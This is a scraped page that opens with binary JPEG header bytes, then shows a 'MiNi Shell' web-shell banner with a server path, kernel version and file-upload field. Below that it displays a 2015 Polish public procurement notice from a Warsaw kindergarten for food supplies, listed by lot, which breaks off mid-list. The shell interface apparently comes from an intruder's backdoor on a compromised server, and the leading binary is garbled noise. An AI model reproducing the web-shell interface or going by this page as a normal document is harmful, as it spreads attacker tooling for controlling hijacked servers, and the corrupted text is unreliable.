JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151124/171817-N-2015.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na pakiety</b><br>
<b>Numer ogłoszenia: 171817 - 2015; data zamieszczenia: 24.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 24 , ul. Drewniana 10/16, 00-345 Warszawa, woj. mazowieckie, tel. 22 826 42 63, faks 22 826 42 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.p24.przedszkola.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na pakiety.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na pakiety.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających nie przekraczających łącznie 20% wartości udzielonego zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.p24.przedszkola.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 24 w Warszawie, ul. Drewniana 10/16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2015 godzina 10:00, miejsce: Przedszkole Nr 24 w Warszawie, ul. Drewniana 10/16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta  z czystego pieczywa pszennego  ( jasna)  - 400 g


szt.

180

Ciasteczka owsiane cynamonowe bez dodatku cukru , bez konserwantów w opakowaniach 150g

szt

         150

Ciastka  owsiane - pakowane w opakowania  300 g.- bez konserwantów

szt.

80

Cynamon  mielony pakowany w torebki  30g

szt.

13

Chrzan  tarty w słoikach bez konserwantów  260 g

szt.

8

Cukier biały, sypki, pakowany w torby a 1000g

szt.

150

Cukier puder a 500 g 

szt.

25

Cukier waniliowy a 32 g.

szt.

240

Drożdże świeże pakowane po 100 g

szt.

40

Galaretka - bez sztucznych barwników i konserwantów ok.75 g

szt.

60

Groch nasiona suche bez zanieczyszczeń


kg

20

Herbata owocowa - ekspresowa, nie granulowana  (różne smaki) , pakowana  w kartony po 20 szt. - 80 g

szt.


260
Herbata zielona pakowana w opakowania po 20 szt.
Szt.

80

Herbata czarna bez dodatków ekspresowa pakowana w paczki po 25 torebek
szt.
20

Kasza jaglana pakowana w torby po  400 g.

szt

30

Kasza jęczmienna mazurska pakowana w torby - 900 g.

kg

70


Kakao naturalne  o obniżonej zawartości tłuszczu  - pudelka - 100g

szt.

100

Kasza gryczana  1000g

kg

50

Kasza manna  400 g

kg

30

Kawa zbożowa  pakowana  w opakowania po  20 szt.

Szt.

40

Kawa  Inka  pakowana w opakowania  po  150 g.

szt

30

Koncentrat pomidorowy 30% - w słoikach  - 190g.

szt.

180

Ketchup -zawartość pomidorów w  120g na 100g  gotowego produktu

     szt.

6

Liście laurowe  - suszone, torebki - 20g.

szt.

12

Majeranek 14 g

szt.

20

Majonez jogurtowy  w słoiku - 200g 

szt.

20

Marmolada wieloowocowa - pakowana w opakowania plastikowe  po  500g.

szt.

10

Makaron świderki- 4 jajeczny - 500g (bez sztucznych barwników)

kg

        200

Makaron krajanka 4 jajeczny - 400g.- (bez sztucznych barwników)

kg

        50

Makaron  nitki - 4 jajeczny - 250 g (bez sztucznych barwników)

kg

          32

Makaron  muszelki - 4 jajeczny - 500g (bez sztucznych barwników)

kg

          50


Makaron  pełnoziarnisty -świderki pakowany w opak.  400 g 
(bez sztucznych barwników)

szt.

        25

Mąka pszenna 1000g

kg

320
Mąka orkiszowa
kg
5
Mąka pełnoziarnista
kg
5

Mąka ziemniaczana -500g.

szt

30

Mięta ekspresowa, pakowana po 20 saszetek - 40 g

szt.

70

Rumianek  ekspresowy pakowany po  20 sztuk

      szt.

30

Miód pszczeli naturalny wielokwiatowy  w słoiku 280 g

szt.

20

Musztarda  łagodna w słoiku -  200g.

szt.

8

Olej rzepakowy z pierwszego tłoczenia   - butelki o pojemności  1l.

litr

160
Oliwa z oliwek pierwszego  tłoczenia do sałatek - butelki o pojemności 
0,50 l.
Szt.
10

Pieprz prawdziwy, czarny, mielony - 20g.  

szt.

40

Fasola sucha - średnio-gruba  - 400g.- (bez zanieczyszczeń

szt.

25

Płatki orkiszowe ekologiczne pakowane w torebki  400 g.

szt

40

Płatki owsiane a naturalne 400g

szt.

50

Płatki jęczmienne  - 400 g 

szt.

65
  
Przyprawa do piernika pakowana w torby po 25 g.                                                                                                          

szt.

10



Proszek do pieczenia  - 18 g.

szt.

90

Przyprawa - bazylia suszona  torebki - 10g

szt.

15

Przyprawa - tymianek suszony - torebki - 10 g.

szt.

15

Przyprawa - papryka słodka, mielona - 20 g

szt.

40

Przyprawa  - rozmaryn  suszony - torebki  20g.

Szt.

10

Przyprawa - Imbir mielony - pakowany w torebki 20g.

szt

5

Rodzynki suszone 200g

szt.

        150

Ryż biały długoziarnisty, sypki, pakowany w torby I klasa  - 1000g

kg

        90

Ryż  brązowy  naturalny pakowany w torby po 400 g.

szt.

70
Sól kamienna  -1000g
kg
10
Sól sodowo- potasowa
kg
20

Soczewica sucha pakowana w torebki po 400g

szt.

15

Czosnek  mielony - przyprawa - 35 g. 

szt.

18
Wiórki kokosowe - torebki - 75 g

szt.

13

Zacierki - makaron - 4 jajeczny bez sztucznych barwników 
 - 250g

szt.

38

Ziele angielskie a 15g

szt.

8

Żurek typu śląski - bez konserwantów, butelki -480ml

szt.

80

Przyprawa - pieprz  ziołowy  20g.
szt.
18


Makaron Spaghetti  - 400g.

szt.

50
Ziarno dyni suszone, torebki  100 g
szt.
60
Orzechy włoskie łuskane, torebki 100 g
szt.
150
Ziarno  słonecznika suszone  torebki 100 g
zt.
60
Orzechy laskowe torebki 100 g
szt.
150
Żurawina suszona 
kg
5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze, świeże, ściółkowe - waga 63-73g - badane pod względem jakości i przydatności do spożycia, pakowane - op. transportowe po 30 sztuk

szt.

    7500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czarna porzeczka mrożona - w opakowania po  2,5 kg

kg

70

Truskawki mrożone -  w opakowaniach po  2,5 kg

kg

120

Wiśnie mrożone -  w opakowaniach po 2,5 kg

kg

70

Mieszanka wieloowocowa - owoce polskie  w opakowaniach 
po  2,5 kg.

kg.

20

Fasolka szparagowa -  w opakowaniach po 2,5 kg

kg.

40
Kalafior mrożony - -  w opakowaniach po 2,5 kg 

kg.

50
Mieszanka wielowarzywna  ( 3 składnikowa) (kalafior, brokuły, marchew) w opakowaniach po 2,5 kg.

kg

30

Brokuły mrożone -  w opakowaniach po 2,5 kg 

kg

30

Włoszczyzna krojona  -  w opakowaniach po 2,5 kg

kg

25

Szpinak mrożony, bez dodatków  -  w opakowaniach po 2,5 kg

kg

30
Marchewka  mrożona ,krojona w kostkę  -  w opakowaniach
 po 2,5 kg
kg
20
Groszek zielony mrożony -  w opakowaniach po 2,5kg. 
kg
10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet  z    dorsza  świeży bez  skóry    - nie  mrożony  
gatunek  I   

kg

    120

Filety z  Mintaja  SHP 4/6  USA / Rosja - ekstra, bez  skóry,  mrożone pojedynczo  ,bez wody, bez  lodu  gatunek  I   -  
(nie głęboko mrożony)

kg.

      80

Łosoś  surowy bez ości - filety świeże nie mrożone  gatunek I
kg
     60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świeże warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Botwina świeża w pęczkach

pęczki

15
Buraki  czerwone,  świeże, bez liści, nie nadmarznięte bez   śladów uszkodzeń mechanicznych i zepsucia

kg

130

Borówka amerykańska, świeża bez oznak popsucia 

kg

25

Bakłażan świeży bez uszkodzeń

kg

10

Cebula świeża bez szczypiorku, krucha nie nadmarznięta

kg

80

Dynia świeża, dojrzała, bez uszkodzeń i oznak zepsucia

kg

18

Fasolka szparagowa  świeża, bez uszkodzeń

kg

30

Kabaczek świeży bez uszkodzeń 

kg 

10

Kalafior świeży, bez uszkodzeń, jędrny duży

szt.

100
Kapusta głowiasta, biała, świeża nie nadmarznięta, bez uszkodzeń 

kg

150

Kapusta kiszona - wiaderko 3 kg

kg

100

Kapusta pekińska, nie nadmarznięta, bez uszkodzeń

kg

100

Kapusta włoska, nie nadmarznięta, bez uszkodzeń

kg

50
Kapusta czerwona, głowiasta, nie nadmarznięta bez śladów uszkodzeń

kg

50

Koper świeży, czysty w pęczkach

pęczki

250
Kalarepa  czysta, świeża  bez  uszkodzeń nie nadmarznięta
kg
10

Maliny świeże czyste bez oznak popsucia

kg

20
Marchew bez naci, świeża, sucha, nie nadmarznięta, bez śladów uszkodzeń

kg

700

Natka pietruszki, czysta, świeża w pęczkach

szt.

250

Ogórki  świeże, czyste bez uszkodzeń

kg

130

Ogórki kwaszone, jędrne w  wiaderku - 3 kg

kg

140

Ogórki małosolne, pakowane w wiaderko - 3 kg

kg

8

Papryka czerwona słodka świeża, zdrowa bez uszkodzeń

kg

75

Pieczarki czyste, świeże, bez uszkodzeń

kg

30

Pietruszka korzeniowa, świeża bez uszkodzeń

kg

280

Pomidory świeże, zdrowe bez uszkodzeń - produkt polski

Kg

370

Pory czyste, świeże

kg

150

Rzodkiewka czysta bez uszkodzeń, pakowana w pęczki

pęczki

340
Rzodkiew  biała  czysta bez  uszkodzeń

kg

20

Sałata zielona, czysta, zdrowa     	       

szt.

438
Sałata lodowa, czysta, zdrowa bez uszkodzeń

szt

60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mleko i jego przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko pasteryzowane, homogenizowane o zawartości tłuszczu 2%,  pakowane w folię o pojemności 1l

litr

3500
Mleko w kartonie 1 l UHT o zawartości tłuszczu 2%
litr
400

Masło świeże w kostkach , zawartość tłuszczu min 73%, opak. 200g.

szt.

880

Masło roślinne pakowane w kubeczki plastikowe o poj. 250 g - zawartość tłuszczu 80%

szt.

350
Śmietana o zawartości tłuszczu 12% opak. Plastikowe o poj. 400 ml
szt.
600

Ser żółty gouda tłusty, pakowany w bloczkach 1000 lub 1500 g
kg
      
90

Jogurt  naturalny  pakowany w kubeczki plastikowe o poj. -  150g.
szt
4 000

Ser twarogowy półtłusty - krajanka  klasa  I , pakowany  w  opakowania  papierowe  z terminem ważności


kg

380.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pieczywo i wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb biały, pszenny, świeży, bez konserwantów z krótkim terminem przydatności do spożycia  -570g

szt.

       600
Chleb razowy wieloziarnisty, świeży,  bez konserwantów z krótkim terminem przydatności do spożycia  - 350g

szt.

        600
Chleb orkiszowy świeży , bez konserwantów z krótkim terminem przydatności do spożycia  - 350g

szt

       400
Chleb  razowy  słonecznikowy, świeży, bez konserwantów z krótkim terminem przydatności do spożycia- 350g
szt
300
Bułki  graham świeże,  bez konserwantów z krótkim terminem przydatności do spożycia - 350g

szt


300    
Bułeczki razowe  z ziarnem  ,bez konserwantów z krótkim terminem przydatności do spożycia - 70g

szt


500
         
Bułeczki orkiszowe , bez konserwantów z krótkim terminem przydatności do spożycia -350g

szt

150
Kajzerki świeże, bez konserwantów z krótkim terminem przydatności do spożycia -50g

szt

500
Bułka długa, typu wrocławska, świeża , bez konserwantów z krótkim terminem przydatności do spożycia -250g

szt

        500
        
Chałka duża naturalna  z obniżoną zawartością a cukru, świeża, bez konserwantów - 300g
( zawartość cukru w gotowym do spożycia produkcie  nie może przekroczyć 10 g na 100 g gotowego produktu)
szt
150

Drożdżówka naturalna z jabłkiem, świeża, bez konserwantów 
 ( zawartość cukru w gotowym do spożycia produkcie  nie może przekroczyć 10 g na 100 g gotowego produktu)

szt.

       300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z piersi indyka bez skóry, elementy świeże

kg

               90
Udziec z indyka  b/k  kości, bez skóry elementy świeże

kg

             60

Filet z kurczaka bez skóry, elementy świeże

kg

              50

Schab wieprzowy środkowy ,b/k, surowy, elementy świeże



             80           

Pałeczki z kurczaka, surowe, elementy świeże

kg

             70

Udziec cielęcy, bez kości, elementy świeże

kg

             50

Udziec wołowy bez kości, elementy świeże

kg

              50

Wieprzowina - szynka surowa, bez kości, elementy świeże

Kg

             20

Polędwica wieprzowa surowa, elementy świeże

kg

             60     

Kurczaki - tuszki surowe, świeże

kg

            10        
KIEŁBASA SZYNKOWA Z FILETA  KURCZAKA grubo rozdrobniona, wędzona, parzona , mięso drobiowe  (w 100g produktu  gotowego zawartość fileta z kurczaka  103 g )

kg
     
         30   
SZYNKA DROBIOWA Z FILETA  INDYKA -zawartość mięsa  z piersi Indyka  ponad 90%
kg
      
         30
SZYNKA WIEJSKA, SWOJSKA, CHUDA, GOTOWANA, min, 90% mięsa wieprzowego, bez tłuszczu 

kg

          40           
SCHAB JAK ZE WSI - Schab wieprzowy : parzony, zawartość schabu wieprzowego ponad 74%

kg

         30         
KIEŁBASA KRAKOWSKA PODSUSZANA PARZONA, grubo rozdrobniona, wysoko wydajna, mięso wieprzowe ponad 70%

Kg

        30           
PARÓWKI Z SZYNKI, zawartości mięsa z szynki 87 %, bez konserwantów

kg

           30.</p></li>
